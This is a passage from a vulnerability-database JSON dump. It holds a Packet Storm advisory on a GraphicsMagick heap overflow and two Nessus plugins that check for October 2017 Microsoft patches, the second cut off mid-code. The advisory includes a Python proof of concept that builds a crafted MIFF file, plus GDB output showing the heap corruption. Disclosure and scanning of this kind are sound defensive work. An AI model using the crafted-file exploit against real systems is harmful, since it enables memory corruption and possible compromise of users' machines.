Value corrupted by StringToList\") \nexit() \nmain_arena_leak = u64(leak.ljust(8, \"\\x00\")) \nlog.info(\"Main Arena Leak: 0x%x\" % main_arena_leak) \nlibc_base = main_arena_leak - libc_main_arena_entry_offset \nlog.info(\"libc Base: 0x%x\" % libc_base) \n \nif __name__ == \"__main__\": \nmain() \n \n \nHeap Overflow \nGraphicsMagick is vulnerable to a heap overflow vulnerability found in DescribeImage() function of the magick/describe.c file. \n \nThe call to strncpy on line 855 does not limit the size to be copied to the size of the buffer copied to. Instead, the size is calculated by searching for a newline or a null byte in the directory name. \n \n844 /* \n845 Display visual image directory. \n846 */ \n847 image_info=CloneImageInfo((ImageInfo *) NULL); \n848 (void) CloneString(&image_info->size,\"64x64\"); \n849 (void) fprintf(file,\" Directory:\\n\"); \n850 for (p=image->directory; *p != '\\0'; p++) \n851 { \n852 q=p; \n853 while ((*q != '\\n') && (*q != '\\0')) \n854 q++; \n855 (void) strncpy(image_info->filename,p,q-p); \n856 image_info->filename[q-p]='\\0'; \n857 p=q; \n... \n880 } \n881 DestroyImageInfo(image_info); \n \nSince the field filename in the ImageInfo struct has the static size of 2053, the heap can be corrupted by forging an overly long directory name. \n \n \ntype = struct _ImageInfo { \n... \nFILE *file; \nchar magick[2053]; \nchar filename[2053]; \n_CacheInfoPtr_ cache; \nvoid *definitions; \nImage *attributes; \nunsigned int ping; \nPreviewType preview_type; \nunsigned int affirm; \n_BlobInfoPtr_ blob; \nsize_t length; \nchar unique[2053]; \nchar zero[2053]; \nunsigned long signature; \n} \n \nOne possible way to trigger the vulnerability is to run the identify command on a specially crafted MIFF format file with the verbose flag. \n \nProof of Concept \nThe following proof of concept script will generate a specially crafted MIFF file exploit.miff. 
\n''' \n \n#!/usr/bin/python \n \nfrom pwn import * \n \npartitions = ('id=ImageMagick version=1.0\\nclass=DirectClass matte=False\\n' + \n'columns=1 rows=1 depth=16\\nscene=1\\nmontage=1x1+0+0\\n\\x0c\\n' + \n':\\x1a', \n'\\n\\x00\\xbe\\xbe\\xbe\\xbe\\xbe\\xbe\\n') \noutput = \"exploit.miff\" \n \ndef main(): \npayload = \"A\"*10000 \npayload = partitions[0] + payload + partitions[1] \nfile(output, \"w\").write(payload) \n \nif __name__ == \"__main__\": \nmain() \n \n''' \nRunning the GraphicsMagick gm utility with the arguments identify -verbose in GDB and breaking after the vulnerable strncpy call, and examining the corrupted ImageInfo object demonstrates that the heap corruption was successful. \n \n \ngefa$? r identify -verbose exploit.miff \n... \ngefa$? br describe.c:856 \nBreakpoint 1 at 0x4571df: file magick/describe.c, line 856. \n... \ngefa$? p *image_info \n$3 = { \n... \ncompression = UndefinedCompression, \nfile = 0x0, \nmagick = '\\000' <repeats 2052 times>, \nfilename = 'A' <repeats 2053 times>, \ncache = 0x4141414141414141, \ndefinitions = 0x4141414141414141, \nattributes = 0x4141414141414141, \nping = 0x41414141, \npreview_type = 1094795585, \naffirm = 0x41414141, \nblob = 0x4141414141414141, \nlength = 0x4141414141414141, \nunique = 'A' <repeats 2053 times>, \nzero = 'A' <repeats 2053 times>, \nsignature = 0x4141414141414141 \n} \n''' \n \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/144878/graphicsmagick-discloseoverflow.txt"}], "nessus": [{"lastseen": "2019-12-13T09:18:16", "bulletinFamily": "scanner", "description": "The Internet Explorer installation on the remote host is\nmissing security updates. 
It is, therefore, affected by\nmultiple vulnerabilities :\n\n - A remote code execution vulnerability exists when\n Internet Explorer improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way\n that an attacker could execute arbitrary code in the\n context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2017-11813,\n CVE-2017-11822)\n\n - An information disclosure vulnerability exists when\n Internet Explorer improperly handles objects in memory.\n An attacker who successfully exploited the vulnerability\n could obtain information to further compromise the users\n system. (CVE-2017-11790)\n\n - A remote code execution vulnerability exists in the way\n that the scripting engine handles objects in memory in\n Internet Explorer. The vulnerability could corrupt\n memory in such a way that an attacker could execute\n arbitrary code in the context of the current user. An\n attacker who successfully exploited the vulnerability\n could gain the same user rights as the current user.\n (CVE-2017-11793, CVE-2017-11810)", "modified": "2019-12-02T00:00:00", "id": "SMB_NT_MS17_OCT_INTERNET_EXPLORER.NASL", "href": "https://www.tenable.com/plugins/nessus/104895", "published": "2017-11-30T00:00:00", "title": "Security Updates for Internet Explorer (October 2017)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. 
The text\n# itself is copyright (C) Microsoft Corporation.\n#\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(104895);\n script_version(\"1.8\");\n script_cvs_date(\"Date: 2018/08/03 11:35:09\");\n\n script_cve_id(\n \"CVE-2017-11790\",\n \"CVE-2017-11793\",\n \"CVE-2017-11810\",\n \"CVE-2017-11813\",\n \"CVE-2017-11822\"\n );\n script_bugtraq_id(\n 101077,\n 101081,\n 101083,\n 101122,\n 101141\n );\n script_xref(name:\"MSKB\", value:\"4041681\");\n script_xref(name:\"MSKB\", value:\"4041690\");\n script_xref(name:\"MSKB\", value:\"4041693\");\n script_xref(name:\"MSKB\", value:\"4040685\");\n script_xref(name:\"MSFT\", value:\"MS17-4041681\");\n script_xref(name:\"MSFT\", value:\"MS17-4041690\");\n script_xref(name:\"MSFT\", value:\"MS17-4041693\");\n script_xref(name:\"MSFT\", value:\"MS17-4040685\");\n\n script_name(english:\"Security Updates for Internet Explorer (October 2017)\");\n script_summary(english:\"Checks for Microsoft security updates.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The Internet Explorer installation on the remote host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The Internet Explorer installation on the remote host is\nmissing security updates. It is, therefore, affected by\nmultiple vulnerabilities :\n\n - A remote code execution vulnerability exists when\n Internet Explorer improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way\n that an attacker could execute arbitrary code in the\n context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2017-11813,\n CVE-2017-11822)\n\n - An information disclosure vulnerability exists when\n Internet Explorer improperly handles objects in memory.\n An attacker who successfully exploited the vulnerability\n could obtain information to further compromise the users\n system. 
(CVE-2017-11790)\n\n - A remote code execution vulnerability exists in the way\n that the scripting engine handles objects in memory in\n Internet Explorer. The vulnerability could corrupt\n memory in such a way that an attacker could execute\n arbitrary code in the context of the current user. An\n attacker who successfully exploited the vulnerability\n could gain the same user rights as the current user.\n (CVE-2017-11793, CVE-2017-11810)\");\n # https://support.microsoft.com/en-us/help/4041681/windows-7-update-kb4041681\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?1d1a2595\");\n # https://support.microsoft.com/en-us/help/4041690/windows-server-2012-update-kb4041690\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?e258896f\");\n # https://support.microsoft.com/en-us/help/4041693/windows-81-update-kb4041693\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?1c3325f2\");\n # https://support.microsoft.com/en-us/help/4040685/cumulative-security-update-for-internet-explorer\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?86f61c93\");\n script_set_attribute(attribute:\"solution\", value:\n\"Microsoft has released security updates for the affected versions of Internet Explorer.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:H/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/11/23\");\n script_set_attribute(attribute:\"patch_publication_date\", 
value:\"2017/11/23\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/11/30\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:microsoft:ie\"); \n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n script_copyright(english:\"This script is Copyright (C) 2017-2018 Tenable Network Security, Inc.\");\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = 'MS17-10';\nkbs = make_list(\n '4041681',\n '4041690',\n '4041693',\n '4040685'\n);\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nos = get_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(vista:'2', win7:'1', win8:'0', win81:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nproductname = get_kb_item_or_exit(\"SMB/ProductName\", exit_code:1);\nif (\"Windows 8\" >< productname && \"8.1\" >!< productname)\n audit(AUDIT_OS_SP_NOT_VULN);\nif (\"Vista\" >< productname) audit(AUDIT_OS_SP_NOT_VULN);\n\nif (hotfix_check_server_core() == 1) audit(AUDIT_WIN_SERVER_CORE);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n # Windows 8.1 / Windows Server 2012 R2\n # Internet Explorer 11\n 
hotfix_is_vulnerable(os:\"6.3\", sp:0, file:\"mshtml.dll\", version:\"11.0.9600.18817\", min_version:\"11.0.9600.16000\", dir:\"\\system32\", bulletin:bulletin, kb:\"4040685\") ||\n\n # Windows Server 2012\n # Internet Explorer 10\n hotfix_is_vulnerable(os:\"6.2\", sp:0, file:\"mshtml.dll\", version:\"10.0.9200.22277\", min_version:\"10.0.9200.16000\", dir:\"\\system32\", bulletin:bulletin, kb:\"4040685\") ||\n\n # Windows 7 / Server 2008 R2\n # Internet Explorer 11\n hotfix_is_vulnerable(os:\"6.1\", sp:1, file:\"mshtml.dll\", version:\"11.0.9600.18817\", min_version:\"11.0.9600.16000\", dir:\"\\system32\", bulletin:bulletin, kb:\"4040685\") ||\n\n # Windows Server 2008\n # Internet Explorer 9\n hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"mshtml.dll\", version:\"9.0.8112.21061\", min_version:\"9.0.8112.16000\", dir:\"\\system32\", bulletin:bulletin, kb:\"4040685\")\n)\n{\n report = '\\nNote: The fix for this issue is available in either of the following updates:\\n';\n report += ' - KB4040685 : Cumulative Security Update for Internet Explorer\\n';\n if(os == \"6.3\")\n {\n report += ' - KB4041693 : Windows 8.1 / Server 2012 R2 Monthly Rollup\\n';\n hotfix_add_report(bulletin:'MS17-10', kb:'4041693', report);\n }\n else if(os == \"6.2\")\n {\n report += ' - KB4041690 : Windows Server 2012 Monthly Rollup\\n';\n hotfix_add_report(bulletin:'MS17-10', kb:'4041690', report);\n }\n else if(os == \"6.1\")\n {\n report += ' - KB4041681 : Windows 7 / Server 2008 R2 Monthly Rollup\\n';\n hotfix_add_report(bulletin:'MS17-10', kb:'4041681', report);\n }\n set_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n\n", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-12-13T09:18:16", "bulletinFamily": "scanner", "description": "The remote Windows host is missing multiple security updates 
released\non 2017/10/10. It is, therefore, affected by multiple\nvulnerabilities :\n\n- A buffer overflow vulnerability exists in the Microsoft JET\n Database Engine that could allow remote code execution on an\n affected system. An attacker who successfully exploited this\n vulnerability could take complete control of an affected system.\n (CVE-2017-0250)\n\n - A remote code execution vulnerability exists when\n Windows Search handles objects in memory. An attacker\n who successfully exploited this vulnerability could take\n control of the affected system. An attacker could then\n install programs; view, change, or delete data; or\n create new accounts with full user rights.\n (CVE-2017-11771)\n\n - An elevation of privilege vulnerability exists when the\n Windows Graphics Component improperly handles objects in\n memory. An attacker who successfully exploited this\n vulnerability could run processes in an elevated\n context. (CVE-2017-11824)\n\n - An elevation of privilege vulnerability exists when the\n Windows kernel-mode driver fails to properly handle\n objects in memory. An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights. (CVE-2017-8689, CVE-2017-8694)\n\n - A buffer overflow vulnerability exists in the Microsoft\n JET Database Engine that could allow remote code\n execution on an affected system. An attacker who\n successfully exploited this vulnerability could take\n control of an affected system. An attacker could then\n install programs; view, change, or delete data; or\n create new accounts with full user rights. Users whose\n accounts are configured to have fewer user rights on the\n system could be less impacted than users who operate\n with administrative user rights. 
(CVE-2017-8717,\n CVE-2017-8718)\n\n - An information disclosure vulnerability exists in the\n way that the Windows Graphics Device Interface (GDI)\n handles objects in memory, allowing an attacker to\n retrieve information from a targeted system. By itself,\n the information disclosure does not allow arbitrary code\n execution; however, it could allow arbitrary code to be\n run if the attacker uses it in combination with another\n vulnerability. (CVE-2017-11816)\n\n - An information disclosure vulnerability exists in the\n way that the Windows SMB Server handles certain\n requests. An authenticated attacker who successfully\n exploited this vulnerability could craft a special\n packet, which could lead to information disclosure from\n the server. (CVE-2017-11815)\n\n - An information disclosure vulnerability exists when the\n Windows kernel improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could obtain information to further compromise the users\n system. (CVE-2017-11765, CVE-2017-11814)\n\n - A remote code execution vulnerability exists in the way\n that the scripting engine handles objects in memory in\n Internet Explorer. The vulnerability could corrupt\n memory in such a way that an attacker could execute\n arbitrary code in the context of the current user. An\n attacker who successfully exploited the vulnerability\n could gain the same user rights as the current user.\n (CVE-2017-11793, CVE-2017-11810)\n\n - A remote code execution vulnerability exists when the\n Windows font library improperly handles specially\n crafted embedded fonts. An attacker who successfully\n exploited the vulnerability could take control of the\n affected system. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with full user rights. 
(CVE-2017-11762,\n CVE-2017-11763)\n\n - An information disclosure vulnerability exists when\n Internet Explorer improperly handles objects in memory.\n An attacker who successfully exploited the vulnerability\n could obtain information to further compromise the users\n system. (CVE-2017-11790)\n\n - An information disclosure vulnerability exists when the\n Windows kernel improperly initializes objects in memory.\n (CVE-2017-11817)\n\n - A denial of service vulnerability exists in the\n Microsoft Server Block Message (SMB) when an attacker\n sends specially crafted requests to the server. An\n attacker who exploited this vulnerability could cause\n the affected system to crash. To attempt to exploit this\n issue, an attacker would need to send specially crafted\n SMB requests to the target system. Note that the denial\n of service vulnerability would not allow an attacker to\n execute code or to elevate their user rights, but it\n could cause the affected system to stop accepting\n requests. The security update addresses the\n vulnerability by correcting the manner in which SMB\n handles specially crafted client requests.\n (CVE-2017-11781)\n\n - A remote code execution vulnerability exists when\n Internet Explorer improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way\n that an attacker could execute arbitrary code in the\n context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2017-11822)\n\n - An Information disclosure vulnerability exists when\n Windows Search improperly handles objects in memory. An\n attacker who successfully exploited the vulnerability\n could obtain information to further compromise the users\n system. (CVE-2017-11772)\n\n - A remote code execution vulnerability exists in the way\n that the Microsoft Server Message Block 1.0 (SMBv1)\n server handles certain requests. 
An attacker who\n successfully exploited the vulnerability could gain the\n ability to execute code on the target server.\n (CVE-2017-11780)\n\n - An information disclosure vulnerability exists in the\n Windows kernel that could allow an attacker to retrieve\n information that could lead to a Kernel Address Space\n Layout Randomization (ASLR) bypass. An attacker who\n successfully exploited the vulnerability could retrieve\n the memory address of a kernel object. (CVE-2017-11784,\n CVE-2017-11785)\n\n - A spoofing vulnerability exists in the Windows\n implementation of wireless networking. An attacker who\n successfully exploited this vulnerability could\n potentially replay broadcast and/or multicast traffic\n to hosts on a WPA or WPA 2-protected wireless network.\n (CVE-2017-13080)", "modified": "2019-12-02T00:00:00", "id": "SMB_NT_MS17_OCT_WIN2008.NASL", "href": "https://www.tenable.com/plugins/nessus/103816", "published": "2017-10-12T00:00:00", "title": "Windows 2008 October 2017 Multiple Security Updates (KRACK)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from the Microsoft Security Updates API. 
The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(103816);\n script_version(\"1.20\");\n script_cvs_date(\"Date: 2019/11/12\");\n\n script_cve_id(\n \"CVE-2017-0250\",\n \"CVE-2017-8689\",\n \"CVE-2017-8694\",\n \"CVE-2017-8717\",\n \"CVE-2017-8718\",\n \"CVE-2017-11762\",\n \"CVE-2017-11763\",\n \"CVE-2017-11765\",\n \"CVE-2017-11771\",\n \"CVE-2017-11772\",\n \"CVE-2017-11780\",\n \"CVE-2017-11781\",\n \"CVE-2017-11784\",\n \"CVE-2017-11785\",\n \"CVE-2017-11790\",\n \"CVE-2017-11793\",\n \"CVE-2017-11810\",\n \"CVE-2017-11814\",\n \"CVE-2017-11815\",\n \"CVE-2017-11816\",\n \"CVE-2017-11817\",\n \"CVE-2017-11822\",\n \"CVE-2017-11824\",\n \"CVE-2017-13080\"\n );\n script_bugtraq_id(\n 98100,\n 101077,\n 101081,\n 101093,\n 101094,\n 101095,\n 101099,\n 101100,\n 101108,\n 101109,\n 101110,\n 101111,\n 101114,\n 101116,\n 101122,\n 101128,\n 101136,\n 101140,\n 101141,\n 101147,\n 101149,\n 101161,\n 101162,\n 101274\n );\n script_xref(name:\"MSKB\", value:\"4042050\");\n script_xref(name:\"MSFT\", value:\"MS17-4042050\");\n script_xref(name:\"MSKB\", value:\"4041671\");\n script_xref(name:\"IAVA\", value:\"2017-A-0310\");\n script_xref(name:\"MSFT\", value:\"MS17-4041671\");\n script_xref(name:\"MSKB\", value:\"4041944\");\n script_xref(name:\"MSFT\", value:\"MS17-4041944\");\n script_xref(name:\"MSKB\", value:\"4041995\");\n script_xref(name:\"MSFT\", value:\"MS17-4041995\");\n script_xref(name:\"MSKB\", value:\"4050795\");\n script_xref(name:\"MSFT\", value:\"MS17-4050795\");\n script_xref(name:\"MSKB\", value:\"4042067\");\n script_xref(name:\"MSFT\", value:\"MS17-4042067\");\n script_xref(name:\"MSKB\", value:\"4042120\");\n script_xref(name:\"MSFT\", value:\"MS17-4042120\");\n script_xref(name:\"MSKB\", value:\"4042121\");\n script_xref(name:\"MSFT\", value:\"MS17-4042121\");\n script_xref(name:\"MSKB\", value:\"4042122\");\n script_xref(name:\"MSFT\", value:\"MS17-4042122\");\n\n 
script_name(english:\"Windows 2008 October 2017 Multiple Security Updates (KRACK)\");\n script_summary(english:\"Checks the existence of Windows Server 2008 October 2017 Patches.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing multiple security updates released\non 2017/10/10. It is, therefore, affected by multiple\nvulnerabilities :\n\n- A buffer overflow vulnerability exists in the Microsoft JET\n Database Engine that could allow remote code execution on an\n affected system. An attacker who successfully exploited this\n vulnerability could take complete control of an affected system.\n (CVE-2017-0250)\n\n - A remote code execution vulnerability exists when\n Windows Search handles objects in memory. An attacker\n who successfully exploited this vulnerability could take\n control of the affected system. An attacker could then\n install programs; view, change, or delete data; or\n create new accounts with full user rights.\n (CVE-2017-11771)\n\n - An elevation of privilege vulnerability exists when the\n Windows Graphics Component improperly handles objects in\n memory. An attacker who successfully exploited this\n vulnerability could run processes in an elevated\n context. (CVE-2017-11824)\n\n - An elevation of privilege vulnerability exists when the\n Windows kernel-mode driver fails to properly handle\n objects in memory. An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights. (CVE-2017-8689, CVE-2017-8694)\n\n - A buffer overflow vulnerability exists in the Microsoft\n JET Database Engine that could allow remote code\n execution on an affected system. 
An attacker who\n successfully exploited this vulnerability could take\n control of an affected system. An attacker could then\n install programs; view, change, or delete data; or\n create new accounts with full user rights. Users whose\n accounts are configured to have fewer user rights on the\n system could be less impacted than users who operate\n with administrative user rights. (CVE-2017-8717,\n CVE-2017-8718)\n\n - An information disclosure vulnerability exists in the\n way that the Windows Graphics Device Interface (GDI)\n handles objects in memory, allowing an attacker to\n retrieve information from a targeted system. By itself,\n the information disclosure does not allow arbitrary code\n execution; however, it could allow arbitrary code to be\n run if the attacker uses it in combination with another\n vulnerability. (CVE-2017-11816)\n\n - An information disclosure vulnerability exists in the\n way that the Windows SMB Server handles certain\n requests. An authenticated attacker who successfully\n exploited this vulnerability could craft a special\n packet, which could lead to information disclosure from\n the server. (CVE-2017-11815)\n\n - An information disclosure vulnerability exists when the\n Windows kernel improperly handles objects in memory. An\n attacker who successfully exploited this vulnerability\n could obtain information to further compromise the users\n system. (CVE-2017-11765, CVE-2017-11814)\n\n - A remote code execution vulnerability exists in the way\n that the scripting engine handles objects in memory in\n Internet Explorer. The vulnerability could corrupt\n memory in such a way that an attacker could execute\n arbitrary code in the context of the current user. 
An\n attacker who successfully exploited the vulnerability\n could gain the same user rights as the current user.\n (CVE-2017-11793, CVE-2017-11810)\n\n - A remote code execution vulnerability exists when the\n Windows font library improperly handles specially\n crafted embedded fonts. An attacker who successfully\n exploited the vulnerability could take control of the\n affected system. An attacker could then install\n programs; view, change, or delete data; or create new\n accounts with full user rights. (CVE-2017-11762,\n CVE-2017-11763)\n\n - An information disclosure vulnerability exists when\n Internet Explorer improperly handles objects in memory.\n An attacker who successfully exploited the vulnerability\n could obtain information to further compromise the users\n system. (CVE-2017-11790)\n\n - An information disclosure vulnerability exists when the\n Windows kernel improperly initializes objects in memory.\n (CVE-2017-11817)\n\n - A denial of service vulnerability exists in the\n Microsoft Server Block Message (SMB) when an attacker\n sends specially crafted requests to the server. An\n attacker who exploited this vulnerability could cause\n the affected system to crash. To attempt to exploit this\n issue, an attacker would need to send specially crafted\n SMB requests to the target system. Note that the denial\n of service vulnerability would not allow an attacker to\n execute code or to elevate their user rights, but it\n could cause the affected system to stop accepting\n requests. The security update addresses the\n vulnerability by correcting the manner in which SMB\n handles specially crafted client requests.\n (CVE-2017-11781)\n\n - A remote code execution vulnerability exists when\n Internet Explorer improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way\n that an attacker could execute arbitrary code in the\n context of the current user. 
An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2017-11822)\n\n - An Information disclosure vulnerability exists when\n Windows Search improperly handles objects in memory. An\n attacker who successfully exploited the vulnerability\n could obtain information to further compromise the users\n system. (CVE-2017-11772)\n\n - A remote code execution vulnerability exists in the way\n that the Microsoft Server Message Block 1.0 (SMBv1)\n server handles certain requests. An attacker who\n successfully exploited the vulnerability could gain the\n ability to execute code on the target server.\n (CVE-2017-11780)\n\n - An information disclosure vulnerability exists in the\n Windows kernel that could allow an attacker to retrieve\n information that could lead to a Kernel Address Space\n Layout Randomization (ASLR) bypass. An attacker who\n successfully exploited the vulnerability could retrieve\n the memory address of a kernel object. (CVE-2017-11784,\n CVE-2017-11785)\n\n - A spoofing vulnerability exists in the Windows\n implementation of wireless networking. 
An attacker who\n successfully exploited this vulnerability could\n potentially replay broadcast and/or multicast traffic\n to hosts on a WPA or WPA 2-protected wireless network.\n (CVE-2017-13080)\");\n # https://support.microsoft.com/en-us/help/4042050/security-update-for-the-microsoft-jet-database-engine-remote-code-exec\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?47cf0955\");\n # https://support.microsoft.com/en-us/help/4050795/unexpected-error-from-external-database-driver-error-when-you-create-o\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?9ef65f13\");\n # https://support.microsoft.com/en-us/help/4041995/security-update-for-the-windows-smb-vulnerabilities-in-windows-server\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?cdb3c598\");\n # https://support.microsoft.com/en-us/help/4042067/security-update-for-search-vulnerabilities-in-windows-server-2008\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?492474c1\");\n # https://support.microsoft.com/en-us/help/4041671/security-update-for-the-windows-kernel-information-disclosure-vulnerab\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?11033575\");\n # https://support.microsoft.com/en-us/help/4042122/security-update-for-vulnerabilities-in-windows-server-2008\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?41b63a5b\");\n # https://support.microsoft.com/en-us/help/4042120/security-update-for-vulnerabilities-in-windows-server-2008\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?9e644606\");\n # https://support.microsoft.com/en-us/help/4042121/security-update-for-vulnerabilities-in-windows-server-2008\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?53858948\");\n # https://support.microsoft.com/en-us/help/4040685/cumulative-security-update-for-internet-explorer\n 
script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?86f61c93\");\n # https://support.microsoft.com/en-us/help/4041944/windows-information-disclosure-vulnerability\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?e2287b5e\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply the following security updates :\n\n - 4041671\n - 4041944\n - 4041995\n - 4050795\n - 4042067\n - 4042120\n - 4042121\n - 4042122\n - 4042050\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-11771\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/10/10\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/10/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/10/12\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"II\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2019 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = 'MS17-10';\n\nkbs = make_list(\n \"4032201\",\n \"4034786\",\n \"4038874\",\n \"4039038\",\n \"4039266\",\n \"4039325\",\n \"4039384\"\n);\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\n# KBs only apply to Windows 2008\nif (hotfix_check_sp_range(vista:'2') <= 0)\n audit(AUDIT_OS_SP_NOT_VULN);\n\nproductname = get_kb_item_or_exit(\"SMB/ProductName\", exit_code:1);\nif (\"Vista\" >< productname) audit(AUDIT_OS_SP_NOT_VULN);\n\nsystemroot = hotfix_get_systemroot();\nif (!systemroot) audit(AUDIT_PATH_NOT_DETERMINED, 'system root');\n\nport = kb_smb_transport();\nlogin = kb_smb_login();\npass = kb_smb_password();\ndomain = kb_smb_domain();\n\nif(! 
